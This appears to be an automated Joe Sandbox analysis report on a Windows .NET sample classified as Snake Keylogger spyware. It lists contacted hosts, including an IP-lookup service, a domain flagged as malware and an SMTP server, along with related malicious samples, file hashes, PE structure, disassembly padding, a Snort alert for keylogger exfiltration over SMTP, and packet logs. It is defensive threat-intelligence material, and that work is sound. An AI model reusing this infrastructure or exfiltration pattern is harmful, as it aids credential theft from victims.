http://checkip.dyndns.com	Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A3B000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A2C000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002944000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029FF000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029D3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002881000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/102.129.152.231$	Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002987000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A3B000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A2C000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029FF000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029D3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://scratchdreams.tk	Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	false	6%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://reallyfreegeoip.org/xml/	Zarefy4bOs.exe	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.67.152	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
193.122.6.168	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
208.91.199.225	us2.smtp.mailhostbox.com	United States	394695	PUBLIC-DOMAIN-REGISTRYUS	false
104.21.27.85	scratchdreams.tk	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1422062
Start date and time:	2024-04-08 10:02:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Zarefy4bOs.exe renamed because original name is a hash value
Original Sample Name:	e81ff60c955d9f232d4812a68ef4335f204be923d6aa75c5d309e8fe76eed1ed.exe
Detection:	MAL
Classification:	mal100.troj.spyw.winEXE@1/0@4/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 66 Number of non-executed functions: 51
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:02:58	API Interceptor	11316983x Sleep call for process: Zarefy4bOs.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.67.152	SAT8765456000.xlam.xlsx	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse
	1d4D5ndo0x.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse
	D09876500900000H.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse
	23343100IM00270839_Dekont1.exe	Get hash	malicious	Snake Keylogger	Browse
	Payment_Draft_confirmation.xla.xlsx	Get hash	malicious	Snake Keylogger	Browse
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse
	proforma_Invoice_0009300_74885959969_9876.exe	Get hash	malicious	Snake Keylogger	Browse
	ATM Dekont E-Maili pdf.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse
193.122.6.168	109__Purchase_Order.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	1d4D5ndo0x.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	checkip.dyndns.org/
	PT98765445670009.scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	SDTP098766700000.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	sipari#U015f formu_831512.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	PROFORMA FATURA.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	proforma_Invoice_0009300_74885959969_9876.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Trojan.PackedNET.2725.8730.30889.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Trojan.PackedNET.2725.27231.18654.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Trojan.PackedNET.2725.26841.22155.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
208.91.199.225	Request for Quotation.exe	Get hash	malicious	AgentTesla	Browse
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse
	Solicitud de cotizacion.exe	Get hash	malicious	AgentTesla	Browse
	109__Purchase_Order.exe	Get hash	malicious	Snake Keylogger	Browse
	SecuriteInfo.com.Win32.TrojanX-gen.27067.30548.exe	Get hash	malicious	AgentTesla	Browse
	CV Mariana Alvarez.exe	Get hash	malicious	AgentTesla	Browse
	Quotation - HDPE Fittings.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	CV Mariana Alvarez.exe	Get hash	malicious	AgentTesla	Browse
	CV Mariana Alvarez.exe	Get hash	malicious	AgentTesla	Browse
	CV Mariana Alvarez.exe	Get hash	malicious	AgentTesla	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	VI3 Operation Guide_tech Info versionfdp.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	132.226.8.169
	Remittance_copy.pdf.scr.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	SAT8765456000.xlam.xlsx	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	158.101.44.242
	request-2.doc.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	132.226.8.169
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	Fuy2BDS9W2.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	132.226.247.73
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	lxdriver_setup.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	158.101.44.242
scratchdreams.tk	Remittance_copy.pdf.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	Fuy2BDS9W2.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	104.21.27.85
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.169.18
	109__Purchase_Order.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	1d4D5ndo0x.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	172.67.169.18
	FGT5000800000.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	104.21.27.85
	D09876500900000H.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	172.67.169.18
us2.smtp.mailhostbox.com	AWB-Ref-#32122432 Pdf.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	Request for Quotation.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.225
	PDF Payment Notification fkHWFp2kdYelWk3.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	208.91.199.225
	Solicitud de cotizacion.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.225
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	208.91.199.224
	cgprgRztWc.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.223
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	208.91.199.224
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	208.91.198.143
	Dhl 984857.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
reallyfreegeoip.org	Remittance_copy.pdf.scr.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	SAT8765456000.xlam.xlsx	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	104.21.67.152
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	Fuy2BDS9W2.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	172.67.177.134
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	109__Purchase_Order.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	1d4D5ndo0x.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	104.21.67.152
	FGT5000800000.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	172.67.177.134

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	https://letg.pages.dev/account/js-reporting/?crumb=uZ4.07kERLI&message=javascript_not_enabled&ref=%2Faccount%2Fchallenge%2Fpassword	Get hash	malicious	HTMLPhisher	Browse	150.136.26.45
	SAT8765456000.xlam.xlsx	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	158.101.44.242
	https://objectstorage.sa-saopaulo-1.oraclecloud.com/n/grnf1myuo7lg/b/bucket-20240402-0423/o/indexsmoke.html	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	134.70.84.3
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	mrPTE618YB.exe	Get hash	malicious	PureLog Stealer	Browse	150.136.132.149
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	lxdriver_setup.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	158.101.44.242
	iCareFone.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	193.122.130.0
	http://winning.com.de/4LcLKX1386KvIx6mvpavrrenj4MMBOXAWOTDNDYZC32415IMVO1140976R30	Get hash	malicious	Unknown	Browse	193.122.130.38
	109__Purchase_Order.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
CLOUDFLARENETUS	Shipping Docs.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	8C3H9zQgK2.exe	Get hash	malicious	FormBook	Browse	104.21.80.13
	CA8nLhW9fA.exe	Get hash	malicious	FormBook	Browse	66.235.200.22
	V2i5WDBNV7.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	SecuriteInfo.com.Win32.PWSX-gen.28384.29794.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	240330_unpacked	Get hash	malicious	Unknown	Browse	104.21.62.22
	240330_unpacked	Get hash	malicious	Unknown	Browse	104.21.62.22
	SOA.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	payment slip.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	Swift_copy.pdf.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
PUBLIC-DOMAIN-REGISTRYUS	V2i5WDBNV7.exe	Get hash	malicious	AgentTesla	Browse	207.174.215.249
	payment slip.exe	Get hash	malicious	AgentTesla	Browse	207.174.215.249
	SecuriteInfo.com.Heur.26171.30744.exe	Get hash	malicious	AgentTesla	Browse	162.222.226.100
	AWB-Ref-#32122432 Pdf.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	Request for Quotation.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.225
	PDF Payment Notification fkHWFp2kdYelWk3.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	LMZ05240257824426283637366563_Final Order.vbs	Get hash	malicious	FormBook	Browse	45.113.122.18
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	208.91.199.225
	INVOICE_FEB-888201-2024.exe	Get hash	malicious	AgentTesla	Browse	162.222.226.100
	Solicitud de cotizacion.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.225
CLOUDFLARENETUS	Shipping Docs.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	8C3H9zQgK2.exe	Get hash	malicious	FormBook	Browse	104.21.80.13
	CA8nLhW9fA.exe	Get hash	malicious	FormBook	Browse	66.235.200.22
	V2i5WDBNV7.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	SecuriteInfo.com.Win32.PWSX-gen.28384.29794.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	240330_unpacked	Get hash	malicious	Unknown	Browse	104.21.62.22
	240330_unpacked	Get hash	malicious	Unknown	Browse	104.21.62.22
	SOA.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	payment slip.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	Swift_copy.pdf.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	VI3 Operation Guide_tech Info versionfdp.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	104.21.67.152
	Remittance_copy.pdf.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	file.exe	Get hash	malicious	SmokeLoader, Xehook Stealer	Browse	104.21.67.152
	request-2.doc.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	104.21.67.152
	https://my.visme.co/view/w46vn911-northshore-tractor-ltd	Get hash	malicious	Unknown	Browse	104.21.67.152
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	Fuy2BDS9W2.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	104.21.67.152
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	lxdriver_setup.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	104.21.67.152
3b5074b1b5d032e5620f69f9f700ff0e	Shipping Docs.exe	Get hash	malicious	AgentTesla	Browse	104.21.27.85
	V2i5WDBNV7.exe	Get hash	malicious	AgentTesla	Browse	104.21.27.85
	SecuriteInfo.com.Win32.PWSX-gen.28384.29794.exe	Get hash	malicious	AgentTesla	Browse	104.21.27.85
	SOA.exe	Get hash	malicious	AgentTesla	Browse	104.21.27.85
	payment slip.exe	Get hash	malicious	AgentTesla	Browse	104.21.27.85
	Swift_copy.pdf.exe	Get hash	malicious	AgentTesla	Browse	104.21.27.85
	Booking Form PIF.scr.exe	Get hash	malicious	AgentTesla	Browse	104.21.27.85
	XXaqdD8Tkb.exe	Get hash	malicious	Unknown	Browse	104.21.27.85
	Vrikz9XGsd.exe	Get hash	malicious	Unknown	Browse	104.21.27.85
	XXaqdD8Tkb.exe	Get hash	malicious	Unknown	Browse	104.21.27.85

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.848474243927881
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.79% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Win16/32 Executable Delphi generic (2074/23) 0.01%
File name:	Zarefy4bOs.exe
File size:	133'120 bytes
MD5:	eb9d9bc525bf2cfd5a566ff1939a65d8
SHA1:	d1d9c33251db984f86a31033d94e365ff2787ad6
SHA256:	e81ff60c955d9f232d4812a68ef4335f204be923d6aa75c5d309e8fe76eed1ed
SHA512:	2a41f25fd63148ed2eb2e1b26ae2c889a09c93bcad8ad5ecdf1e7e8deeeceecc030d6a05c38bd520c49d68219721016e62f6d4dfb35407db8fc53b0264239335
SSDEEP:	3072:AA1JAirk7zoewGuynWGMUdNL9blyFFAsQ2wvxLO4LygbY:1AirqzoP6Vd9bKv4L7b
TLSH:	77D31B1937E88814E2FF997302716101C7B6B8531A16DF1D0AD2F4692B7DBA1CE1AF93
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..e..............P.................. ... ....@.. .......................`............@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4211be
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x65D90863 [Fri Feb 23 21:04:35 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x21170	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x22000	0x108f	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x24000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x1f1c4	0x1f200	38fbd64968fd4540516b6ed151d03db4	False	0.3587788654618474	data	5.86247167214779	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x22000	0x108f	0x1200	f59392b7fa5e8b22ad0c6b19a0b07c20	False	0.3663194444444444	data	4.868462934974607	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x24000	0xc	0x200	f07f68609b7dd4d134af65ad7e8480e7	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x220a0	0x394	OpenPGP Secret Key			0.42358078602620086
RT_MANIFEST	0x22434	0xc5b	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.3926651912741069

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/08/24-10:03:49.773592	TCP	2044767	ET TROJAN Snake Keylogger Exfil via SMTP	49728	587	192.168.2.5	208.91.199.225

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 8, 2024 10:02:57.340023041 CEST	49705	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:02:57.577135086 CEST	80	49705	193.122.6.168	192.168.2.5
Apr 8, 2024 10:02:57.577241898 CEST	49705	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:02:57.577605963 CEST	49705	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:02:57.814512014 CEST	80	49705	193.122.6.168	192.168.2.5
Apr 8, 2024 10:02:58.277544022 CEST	80	49705	193.122.6.168	192.168.2.5
Apr 8, 2024 10:02:58.282962084 CEST	49705	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:02:58.519921064 CEST	80	49705	193.122.6.168	192.168.2.5
Apr 8, 2024 10:02:58.521754026 CEST	80	49705	193.122.6.168	192.168.2.5
Apr 8, 2024 10:02:58.568444967 CEST	49705	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:02:58.698631048 CEST	49706	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:02:58.698679924 CEST	443	49706	104.21.67.152	192.168.2.5
Apr 8, 2024 10:02:58.698781013 CEST	49706	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:02:58.705890894 CEST	49706	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:02:58.705910921 CEST	443	49706	104.21.67.152	192.168.2.5
Apr 8, 2024 10:02:58.970863104 CEST	443	49706	104.21.67.152	192.168.2.5
Apr 8, 2024 10:02:58.971009970 CEST	49706	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:02:58.975447893 CEST	49706	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:02:58.975459099 CEST	443	49706	104.21.67.152	192.168.2.5
Apr 8, 2024 10:02:58.975832939 CEST	443	49706	104.21.67.152	192.168.2.5
Apr 8, 2024 10:02:59.021430016 CEST	49706	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:02:59.042711020 CEST	49706	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:02:59.084237099 CEST	443	49706	104.21.67.152	192.168.2.5
Apr 8, 2024 10:02:59.262979031 CEST	443	49706	104.21.67.152	192.168.2.5
Apr 8, 2024 10:02:59.263076067 CEST	443	49706	104.21.67.152	192.168.2.5
Apr 8, 2024 10:02:59.263173103 CEST	49706	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:02:59.269284964 CEST	49706	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:02:59.272654057 CEST	49705	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:02:59.511491060 CEST	80	49705	193.122.6.168	192.168.2.5
Apr 8, 2024 10:02:59.514556885 CEST	49707	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:02:59.514596939 CEST	443	49707	104.21.67.152	192.168.2.5
Apr 8, 2024 10:02:59.514666080 CEST	49707	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:02:59.515074015 CEST	49707	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:02:59.515080929 CEST	443	49707	104.21.67.152	192.168.2.5
Apr 8, 2024 10:02:59.552709103 CEST	49705	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:02:59.781657934 CEST	443	49707	104.21.67.152	192.168.2.5
Apr 8, 2024 10:02:59.784163952 CEST	49707	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:02:59.784188986 CEST	443	49707	104.21.67.152	192.168.2.5
Apr 8, 2024 10:03:00.079196930 CEST	443	49707	104.21.67.152	192.168.2.5
Apr 8, 2024 10:03:00.079307079 CEST	443	49707	104.21.67.152	192.168.2.5
Apr 8, 2024 10:03:00.079371929 CEST	49707	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:03:00.080009937 CEST	49707	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:03:00.083276987 CEST	49705	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:03:00.084616899 CEST	49708	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:03:00.320198059 CEST	80	49705	193.122.6.168	192.168.2.5
Apr 8, 2024 10:03:00.320286036 CEST	49705	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:03:00.322242022 CEST	80	49708	193.122.6.168	192.168.2.5
Apr 8, 2024 10:03:00.322324038 CEST	49708	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:03:00.322504997 CEST	49708	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:03:00.560576916 CEST	80	49708	193.122.6.168	192.168.2.5
Apr 8, 2024 10:03:00.561847925 CEST	80	49708	193.122.6.168	192.168.2.5
Apr 8, 2024 10:03:00.563397884 CEST	49709	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:03:00.563441038 CEST	443	49709	104.21.67.152	192.168.2.5
Apr 8, 2024 10:03:00.563507080 CEST	49709	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:03:00.563872099 CEST	49709	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:03:00.563885927 CEST	443	49709	104.21.67.152	192.168.2.5
Apr 8, 2024 10:03:00.615192890 CEST	49708	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:03:00.821615934 CEST	443	49709	104.21.67.152	192.168.2.5
Apr 8, 2024 10:03:00.823163033 CEST	49709	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:03:00.823187113 CEST	443	49709	104.21.67.152	192.168.2.5
Apr 8, 2024 10:03:01.119183064 CEST	443	49709	104.21.67.152	192.168.2.5
